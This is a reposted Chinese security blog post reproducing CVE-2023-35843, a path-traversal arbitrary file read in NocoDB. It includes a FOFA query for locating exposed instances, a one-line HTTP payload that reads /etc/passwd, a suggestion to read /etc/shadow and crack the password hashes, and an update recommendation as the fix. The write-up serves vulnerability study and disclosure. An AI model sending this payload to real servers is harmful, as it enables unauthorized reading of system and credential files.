漏洞复现NocoDB 任意文件读取(CVE-2023-35843)

admin 2023年10月13日22:20:55评论14 views字数 848阅读2分49秒阅读模式

免费&进群

漏洞复现NocoDB 任意文件读取(CVE-2023-35843)
漏洞复现NocoDB 任意文件读取(CVE-2023-35843)

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二:漏洞影响版本

version<=0.106.1

三:网络空间测绘查询

fofa:
icon_hash="-2017596142"
漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)

四:漏洞复现

poc

GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

漏洞复现NocoDB 任意文件读取(CVE-2023-35843)
漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)

五:漏洞利用

可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作

六:修复建议

及时更新至最新版本

原文地址: https://www.freebuf.com/articles/web/379844.html


声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@

学习更多渗透技能!体验靶场实战练习


漏洞复现NocoDB 任意文件读取(CVE-2023-35843)

hack视频资料及工具

漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)

(部分展示)

往期推荐

给第一次做渗透项目的新手总结的一些感悟

「登陆页面」常见的几种渗透思路与总结!

突破口!入职安服后的经验之谈

红队渗透下的入口权限快速获取

攻防演练|红队手段之将蓝队逼到关站!

CNVD 之5000w通用产品的收集(fofa)

自动化挖掘cnvd证书脚本

Xray捡洞中的高频漏洞

实战|通过供应链一举拿下目标后台权限

实战|一次真实的域渗透拿下域控(内网渗透)

看到这里了,点个“赞”、“再看”吧

原文始发于微信公众号(白帽子左一):漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月13日22:20:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现NocoDB 任意文件读取(CVE-2023-35843)https://cn-sec.com/archives/2109351.html

发表评论

匿名网友 填写信息